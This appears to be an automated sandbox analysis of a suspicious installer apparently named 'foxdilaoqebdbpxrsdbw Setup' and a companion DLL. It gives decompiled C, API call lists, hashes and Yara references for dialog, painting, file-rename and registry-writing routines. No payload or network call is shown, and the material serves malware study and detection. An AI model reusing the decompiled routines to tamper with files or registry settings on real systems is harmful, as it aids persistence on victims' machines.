				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x429fb8 =  *0x429fb8 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403D44(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42db00;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42eb68, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42eb68, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x429fb8 != 0) {
						goto L25;
					} else {
						_t112 =  *0x4297a8 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403CFF(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004040B0();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42e33c; // 0x6c4e95
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x42eb98; // 0x6c3bb4
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403DF1;
				E00403CDD(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403CDD(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403CFF( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403D12(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x42eb70; // 0x6bfe70
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x428f9c =  *0x428f9c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x429fb8 =  *0x429fb8 & 0x00000000;
				return 0;
			}




















                    0x00403e35
                    0x00403f5b
                    0x00403fb7
                    0x00403fbb
                    0x00404092
                    0x00404094
                    0x00404094
                    0x0040409a
                    0x0040409a
                    0x0040409d
                    0x00000000
                    0x004040a4
                    0x00403fc9
                    0x00403fcb
                    0x00403fd5
                    0x00403fe0
                    0x00403fe3
                    0x00403fe6
                    0x00403ff1
                    0x00403ff4
                    0x00403ffb
                    0x00404009
                    0x00404021
                    0x00404034
                    0x00404044
                    0x00404046
                    0x00404046
                    0x00403ffb
                    0x00404050
                    0x00000000
                    0x0040405b
                    0x0040405f
                    0x00404070
                    0x00404070
                    0x00404076
                    0x00404084
                    0x00404084
                    0x00000000
                    0x00404088
                    0x00404050
                    0x00403f66
                    0x00000000
                    0x00403f7a
                    0x00403f80
                    0x00403f86
                    0x00000000
                    0x00000000
                    0x00403fab
                    0x00403fad
                    0x00403fb2
                    0x00000000
                    0x00403fb2
                    0x00403f66
                    0x00403e3b
                    0x00403e3e
                    0x00403e43
                    0x00403e45
                    0x00403e54
                    0x00403e54
                    0x00403e56
                    0x00403e5b
                    0x00403e5e
                    0x00403e60
                    0x00403e65
                    0x00403e6e
                    0x00403e74
                    0x00403e80
                    0x00403e83
                    0x00403e8c
                    0x00403e91
                    0x00403e94
                    0x00403e99
                    0x00403eb0
                    0x00403eb7
                    0x00403eca
                    0x00403ecd
                    0x00403ee2
                    0x00403ee4
                    0x00403ee9
                    0x00403eee
                    0x00403ef3
                    0x00403ef3
                    0x00403f02
                    0x00403f11
                    0x00403f13
                    0x00403f29
                    0x00403f38
                    0x00403f3a
                    0x00000000

                    APIs
                    • CheckDlgButton.USER32 ref: 00403EB0
                    • GetDlgItem.USER32 ref: 00403EC4
                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403EE2
                    • GetSysColor.USER32(?), ref: 00403EF3
                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403F02
                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403F11
                    • lstrlenA.KERNEL32(?), ref: 00403F1B
                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403F29
                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00403F38
                    • GetDlgItem.USER32 ref: 00403F9B
                    • SendMessageA.USER32(00000000), ref: 00403F9E
                    • GetDlgItem.USER32 ref: 00403FC9
                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404009
                    • LoadCursorA.USER32 ref: 00404018
                    • SetCursor.USER32(00000000), ref: 00404021
                    • ShellExecuteA.SHELL32(0000070B,open,0042DB00,00000000,00000000,00000001), ref: 00404034
                    • LoadCursorA.USER32 ref: 00404041
                    • SetCursor.USER32(00000000), ref: 00404044
                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404070
                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404084
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                    • String ID: N$open$qdrjldxxem
                    • API String ID: 3615053054-460575336
                    • Opcode ID: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                    • Instruction ID: ff75cf5183ce2723ba3e9af3fd3b1123c83c1709a93184edc862a5803e63a157
                    • Opcode Fuzzy Hash: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                    • Instruction Fuzzy Hash: 3861CEB1A40209BFEB109F60CD45F6A7B69EB44715F10843AFB05BA2D1C7B8AD51CF98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10001850, Relevance: 31.7, APIs: 10, Strings: 8, Instructions: 176registryCOMMON
                    Download Yara Rule
                    APIs
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 100018CF
                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,0002001F,?), ref: 10001919
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 10001937
                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 1000198F
                    • RegSetValueExW.ADVAPI32(?,Description,00000000,00000001,00000000,?), ref: 100019C0
                    • RegSetValueExW.ADVAPI32(?,IconFile,00000000,00000001,?,?), ref: 100019DD
                    • RegSetValueExW.ADVAPI32(?,IconIndex,00000000,00000004,?,00000004), ref: 100019F6
                    • RegSetValueExW.ADVAPI32(?,Enable,00000000,00000004,00000000,00000004), ref: 10001A15
                    • RegCloseKey.ADVAPI32(?), ref: 10001A1F
                    • RegCloseKey.ADVAPI32(?), ref: 10001A3E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Value$CloseFromString$CreateOpen
                    • String ID: %s\%s$%s\0x%08x\%s$(%p) %s %x %s %s %s %i$Description$Enable$IconFile$IconIndex$LanguageProfile
                    • API String ID: 4095516225-583810935
                    • Opcode ID: fac05dc62692443a1795ad4fadb8c4f4760528b0f3b42c489fbd5947a9bcfcaf
                    • Instruction ID: 940509a64bb7413368312f011f5939ae1bae5f701a0e848fc53be0b70f13a253
                    • Opcode Fuzzy Hash: fac05dc62692443a1795ad4fadb8c4f4760528b0f3b42c489fbd5947a9bcfcaf
                    • Instruction Fuzzy Hash: DE512DB6A00218BBEB14DF94DC85FEF73B9EB48744F008508FA09A6185D774EA84CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                    Download Yara Rule
                    C-Code - Quality: 90%
                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42eb70; // 0x6bfe70
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "foxdilaoqebdbpxrsdbw Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x42eb68; // 0x1302d6
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                    0x0040100a
                    0x00401039
                    0x00401047
                    0x0040104d
                    0x00401051
                    0x0040105b
                    0x00401061
                    0x00401064
                    0x004010f3
                    0x00401089
                    0x0040108c
                    0x004010a6
                    0x004010bd
                    0x004010cc
                    0x004010cf
                    0x004010d5
                    0x004010d9
                    0x004010e4
                    0x004010ed
                    0x004010ef
                    0x004010ef
                    0x00401100
                    0x00401105
                    0x0040110d
                    0x00401110
                    0x00401112
                    0x00401118
                    0x0040111f
                    0x00401126
                    0x00401130
                    0x00401142
                    0x00401156
                    0x00401160
                    0x00401165
                    0x00401165
                    0x00401110
                    0x0040116e
                    0x00000000
                    0x00401178
                    0x00401010
                    0x00401013
                    0x00401015
                    0x00401019
                    0x0040101f
                    0x0040101f
                    0x00000000

                    APIs
                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                    • BeginPaint.USER32(?,?), ref: 00401047
                    • GetClientRect.USER32 ref: 0040105B
                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                    • FillRect.USER32 ref: 004010E4
                    • DeleteObject.GDI32(?), ref: 004010ED
                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                    • SetTextColor.GDI32(00000000,?), ref: 00401130
                    • SelectObject.GDI32(00000000,?), ref: 00401140
                    • DrawTextA.USER32(00000000,foxdilaoqebdbpxrsdbw Setup,000000FF,00000010,00000820), ref: 00401156
                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                    • DeleteObject.GDI32(?), ref: 00401165
                    • EndPaint.USER32(?,?), ref: 0040116E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                    • String ID: F$foxdilaoqebdbpxrsdbw Setup
                    • API String ID: 941294808-106563543
                    • Opcode ID: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                    • Instruction ID: 226a36137513f208ef2a020474f107b038e547e09bed9ebbc09fe29577f91b00
                    • Opcode Fuzzy Hash: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                    • Instruction Fuzzy Hash: C0419B71804249AFCF058FA5CD459BFBFB9FF44314F00812AF952AA1A0C738AA51DFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10001AD0, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 115registryCOMMON
                    Download Yara Rule
                    APIs
                    • StringFromGUID2.OLE32(00000000,?,00000027), ref: 10001B39
                    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,0002001F,?), ref: 10001B8D
                    • RegQueryValueExW.ADVAPI32(?,Default,00000000,00000000,?,0000004E), ref: 10001BBD
                    • RegCloseKey.ADVAPI32(?), ref: 10001BD0
                    • CLSIDFromString.OLE32(?,00000000), ref: 10001BE5
                    • RegQueryValueExW.ADVAPI32(?,Profile,00000000,00000000,?,0000004E), ref: 10001C00
                    • CLSIDFromString.OLE32(?,00000000), ref: 10001C17
                    • RegCloseKey.ADVAPI32(?), ref: 10001C21
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: FromString$CloseQueryValue$Open
                    • String ID: %p) %x %s %p %p$%s\%s\0x%08x\%s$Assemblies$Default$N$Profile
                    • API String ID: 1689171533-1912333115
                    • Opcode ID: 96e723503d48050ef30a3e68a45785965c9a1915bb743af49780221a9a1529de
                    • Instruction ID: 18a2b948455825383631910d6e83dea1fb37a3c8968b4a0b81802b1bfbf5cb04
                    • Opcode Fuzzy Hash: 96e723503d48050ef30a3e68a45785965c9a1915bb743af49780221a9a1529de
                    • Instruction Fuzzy Hash: 74411DB5900218FBEB11DF94DC89FEE73B9EB48340F108559FA059A144E774EA84CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405679, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E00405679() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405C49(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x42ebf0 =  *0x42ebf0 + 1;
						return _t20;
					}
				}
				 *0x42c168 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bbe0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x42b7e0, "%s=%s\r\n", 0x42c168, 0x42bbe0);
						_t18 =  *0x42eb70; // 0x6bfe70
						_t56 = _t55 + 0x10;
						E0040594D(_t43, 0x400, 0x42bbe0, 0x42bbe0,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E00405602(0x42bbe0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405577(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405577(_t26 + 0xa, 0x409328);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E004055C3(_t51 + _t29, 0x42b7e0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E0040592B(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E00405602(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x42c168, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                    0x0040567f
                    0x00405686
                    0x0040568a
                    0x00405693
                    0x00405697
                    0x004057d6
                    0x004057d6
                    0x00000000
                    0x004057d6
                    0x00405697
                    0x004056a3
                    0x004056b9
                    0x004056e1
                    0x004056ec
                    0x004056f0
                    0x00405710
                    0x00405712
                    0x00405717
                    0x00405721
                    0x0040572e
                    0x00405733
                    0x00405738
                    0x0040573c
                    0x00000000
                    0x00000000
                    0x0040574b
                    0x0040574d
                    0x0040575a
                    0x0040575e
                    0x004057cf
                    0x004057d0
                    0x00000000
                    0x0040577a
                    0x00405787
                    0x004057ec
                    0x004057f3
                    0x0040579a
                    0x0040579a
                    0x0040579c
                    0x004057a5
                    0x004057b0
                    0x004057c2
                    0x004057c9
                    0x00000000
                    0x004057c9
                    0x004057f5
                    0x004057f6
                    0x004057fb
                    0x004057fd
                    0x0040580a
                    0x0040580a
                    0x0040580e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004057ff
                    0x004057ff
                    0x00405802
                    0x00405805
                    0x00405806
                    0x00000000
                    0x004057ff
                    0x00405792
                    0x00405797
                    0x00000000
                    0x00405797
                    0x0040575e
                    0x004056bb
                    0x004056c6
                    0x004056cf
                    0x004056d3
                    0x00000000
                    0x00000000
                    0x004056d3
                    0x004057e0

                    APIs
                      • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                      • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                      • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,0040540E,?,00000000,000000F1,?), ref: 004056C6
                    • GetShortPathNameA.KERNEL32 ref: 004056CF
                    • GetShortPathNameA.KERNEL32 ref: 004056EC
                    • wsprintfA.USER32 ref: 0040570A
                    • GetFileSize.KERNEL32(00000000,00000000,0042BBE0,C0000000,00000004,0042BBE0,?,?,?,00000000,000000F1,?), ref: 00405745
                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405754
                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040576A
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B7E0,00000000,-0000000A,00409328,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B0
                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004057C2
                    • GlobalFree.KERNEL32 ref: 004057C9
                    • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 004057D0
                      • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                      • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                    • String ID: %s=%s$[Rename]
                    • API String ID: 3772915668-1727408572
                    • Opcode ID: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                    • Instruction ID: f99a8e27a0ac237a4403d65adef5acaf7166b20d7f6f9042e90736f67bd768b8
                    • Opcode Fuzzy Hash: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                    • Instruction Fuzzy Hash: 8441D031604B15BBE6216B619C49F6B3A6CEF45754F100436F905F72C2EA78A801CEBD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10001C30, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 153registryCOMMON
                    Download Yara Rule
                    APIs
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 10001D13
                    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 10001D6F
                    • StringFromGUID2.OLE32(00000000,?,00000027), ref: 10001D8A
                    • RegSetValueExW.ADVAPI32(?,Default,00000000,00000001,?,0000004E), ref: 10001DA3
                    • StringFromGUID2.OLE32(00000000,?,00000027), ref: 10001DB3
                    • RegSetValueExW.ADVAPI32(?,Profile,00000000,00000001,?,0000004E), ref: 10001DCC
                    • RegCloseKey.ADVAPI32(?), ref: 10001DD6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: FromString$Value$CloseCreate
                    • String ID: %p) %x %s %s$%s\%s\0x%08x\%s$Assemblies$Default$Profile
                    • API String ID: 1318437696-2502594939
                    • Opcode ID: 05c5194d7e5d92c66f3e5826c9d0eec355b547a4f58760818b7c81c3d92d64a1
                    • Instruction ID: 27c13968a3118dc8c68f4443d35e60864bdd84783e5128327479ecbbaf901254
                    • Opcode Fuzzy Hash: 05c5194d7e5d92c66f3e5826c9d0eec355b547a4f58760818b7c81c3d92d64a1
                    • Instruction Fuzzy Hash: 75513AB5A40208BBEB10CFA4DC85FEE73B8FB48700F108559F605AB185D775EA44CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10002270, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 123registryCOMMON
                    Download Yara Rule
                    APIs
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 100022D9
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 100022E9
                    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,0002001F,?), ref: 10002344
                    • RegQueryValueExW.ADVAPI32(?,Enable,00000000,00000000,00000000,00000004), ref: 1000236F
                    • RegCloseKey.ADVAPI32(?), ref: 1000237C
                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,0002001F,?), ref: 1000239F
                    • RegQueryValueExW.ADVAPI32(?,Enable,00000000,00000000,00000000,00000004), ref: 100023CA
                    • RegCloseKey.ADVAPI32(?), ref: 100023D7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: CloseFromOpenQueryStringValue
                    • String ID: %s\%s\%s\0x%08x\%s$(%p) %s, %i, %s, %p$Enable$LanguageProfile
                    • API String ID: 193680167-3603924166
                    • Opcode ID: bf50fa3f48cea37b60e557fdb462d71aee76edc4478a5d4af328f6ae4ebc464b
                    • Instruction ID: 40391e074440fb52d83601e0a66853126ecbc3a5c3ce8c1250bbd2d5080af09d
                    • Opcode Fuzzy Hash: bf50fa3f48cea37b60e557fdb462d71aee76edc4478a5d4af328f6ae4ebc464b
                    • Instruction Fuzzy Hash: 3E412FB5900219FFEB10DF90CD89FEE77B8EB48340F108558FA19A6185D774AB84DBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10002400, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87registryCOMMON
                    Download Yara Rule
                    APIs
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 10002459
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 10002469
                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,0002001F,?), ref: 100024C4
                    • RegSetValueExW.ADVAPI32(?,Enable,00000000,00000004,?,00000004), ref: 100024E6
                    • RegCloseKey.ADVAPI32(?), ref: 100024F0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
